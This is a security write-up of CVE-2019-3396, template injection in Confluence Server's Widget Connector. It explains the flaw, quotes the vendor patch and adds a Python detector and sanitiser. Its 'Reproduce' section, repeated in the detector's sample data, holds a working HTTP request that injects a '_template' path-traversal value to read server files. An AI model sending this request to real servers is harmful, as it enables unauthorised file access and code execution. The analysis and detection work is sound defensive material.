
【CVE-2019-3396】:SSTI and RCE in Confluence Server via Widget Connector

source link: https://chybeta.github.io/2019/04/06/Analysis-for-%E3%80%90CVE-2019-3396%E3%80%91-SSTI-and-RCE-in-Confluence-Server-via-Widget-Connector/

Twitter: chybeta

Security Advisory

https://confluence.atlassian.com/doc/confluence-security-advisory-2019-03-20-966660264.html

Analysis

According to the documentation, there are three parameters you can set to control the content or format of the macro output: URL, Width and Height.

The Widget Connector defines several renderers, for example FriendFeedRenderer:

public class FriendFeedRenderer implements WidgetRenderer {
    // ... (other members omitted)
    public String getEmbeddedHtml(String url, Map<String, String> params) {
        // The renderer picks its own template, overwriting any client-supplied value.
        params.put("_template", "com/atlassian/confluence/extra/widgetconnector/templates/simplejscript.vm");
        return this.velocityRenderService.render(getEmbedUrl(url), params);
    }
}

In FriendFeedRenderer's getEmbeddedHtml, you can see that the renderer itself puts the extra option _template into the params map.

However, some other renderers, such as those in the video category, just call render(getEmbedUrl(url), params) directly without setting _template themselves.

So in that case we can supply the _template ourselves, and the backend will use the params we sent, including our template path, to render the output.

Reproduce

POST /rest/tinymce/1/macro/preview HTTP/1.1
{"contentId":"65601","macro":{"name":"widget","params":{"url":"https://www.viddler.com/v/test","width":"1000","height":"1000","_template":"../web.xml"},"body":""}}

Patch

In the fixed version, doSanitizeParameters is called before the HTML is rendered, and it removes _template from the parameters. The code looks roughly like this:

public class WidgetMacro extends BaseMacro implements Macro, EditorImagePlaceholder {
    private final List<String> sanitizeFields;

    public WidgetMacro(RenderManager renderManager, LocaleManager localeManager, I18NBeanFactory i18NBeanFactory) {
        // ... (other initialisation omitted)
        this.sanitizeFields = Collections.unmodifiableList(Arrays.asList(new String[] { "_template" }));
    }

    public String execute(Map<String, String> parameters, String body, ConversionContext conversionContext) {
        // ... (url handling omitted)
        doSanitizeParameters(parameters); // strip client-supplied "_template" before rendering
        return this.renderManager.getEmbeddedHtml(url, parameters);
    }

    private void doSanitizeParameters(Map<String, String> parameters) {
        Objects.requireNonNull(parameters);
        for (String sanitizedParameter : this.sanitizeFields) {
            parameters.remove(sanitizedParameter);
        }
    }
}
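As an added example (not part of the original post and not Atlassian's code), the following Python script covers both the Reproduce section and the Patch section above: it mirrors the fix by stripping the server-internal _template key from widget parameters before they would reach a renderer, and it scans request records for the macro preview endpoint shown in the reproduction request, flagging any macro whose params carry _template. The request records, the function names and the INTERNAL_PARAMS set are assumptions made for illustration; the endpoint path and the flagged payload come from the post.

```python
import json
from typing import Dict, List, Tuple

# Endpoint used by the reproduction request in the post.
PREVIEW_ENDPOINT = "/rest/tinymce/1/macro/preview"

# Keys the fixed WidgetMacro strips before rendering. They select a server-side
# template and should never arrive from a client. (Assumed set; the patch shows "_template".)
INTERNAL_PARAMS = frozenset({"_template"})

# Constructed request records: (method, path, JSON body). Record 1 is the payload
# from the Reproduce section; the others are a benign preview, a variation on
# another macro, and an unrelated request.
SAMPLE_REQUESTS: List[Tuple[str, str, str]] = [
    ("POST", PREVIEW_ENDPOINT,
     '{"contentId":"65601","macro":{"name":"widget","params":{"url":"https://www.viddler.com/v/test","width":"640","height":"480"},"body":""}}'),
    ("POST", PREVIEW_ENDPOINT,
     '{"contentId":"65601","macro":{"name":"widget","params":{"url":"https://www.viddler.com/v/test","width":"1000","height":"1000","_template":"../web.xml"},"body":""}}'),
    ("POST", PREVIEW_ENDPOINT,
     '{"contentId":"65601","macro":{"name":"code","params":{"language":"java","_template":"x"},"body":""}}'),
    ("GET", "/rest/api/content/65601", ""),
]


def sanitize_widget_params(params: Dict[str, str]) -> Dict[str, str]:
    """Drop server-internal keys from macro parameters (mirrors doSanitizeParameters)."""
    return {k: v for k, v in params.items() if k not in INTERNAL_PARAMS}


def flag_request(method: str, path: str, body: str) -> List[str]:
    """Return findings for one request; an empty list means nothing suspicious."""
    findings: List[str] = []
    if method.upper() != "POST" or path != PREVIEW_ENDPOINT or not body:
        return findings
    try:
        doc = json.loads(body)
    except ValueError:
        return findings  # not JSON; nothing to inspect here
    macro = doc.get("macro") if isinstance(doc, dict) else None
    if not isinstance(macro, dict):
        return findings
    params = macro.get("params")
    if not isinstance(params, dict):
        return findings
    name = macro.get("name")
    for key, value in params.items():
        if key in INTERNAL_PARAMS:
            detail = f"client-supplied internal parameter {key}={value!r} in macro {name!r}"
            # A traversal sequence or a URL scheme in a template selector is the
            # shape of the published payload, so call it out explicitly.
            if ".." in str(value) or "://" in str(value):
                detail += " (path traversal or remote reference)"
            findings.append(detail)
    return findings


def scan(records) -> List[Tuple[int, List[str]]]:
    """Run flag_request over every record; return (index, findings) for hits only."""
    hits: List[Tuple[int, List[str]]] = []
    for i, (method, path, body) in enumerate(records):
        findings = flag_request(method, path, body)
        if findings:
            hits.append((i, findings))
    return hits


if __name__ == "__main__":
    for index, findings in scan(SAMPLE_REQUESTS):
        for f in findings:
            print(f"request {index}: {f}")
```

Run as a script it reports records 1 and 2; record 2 is flagged too because the preview endpoint accepts any macro name, and a leading-underscore key from a client is worth a look regardless of which macro it targets. The sanitizer is deliberately a deny-list of internal keys, the same shape as the vendor fix, rather than a path check on the value: a renderer should never consult a client-supplied template selector at all.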


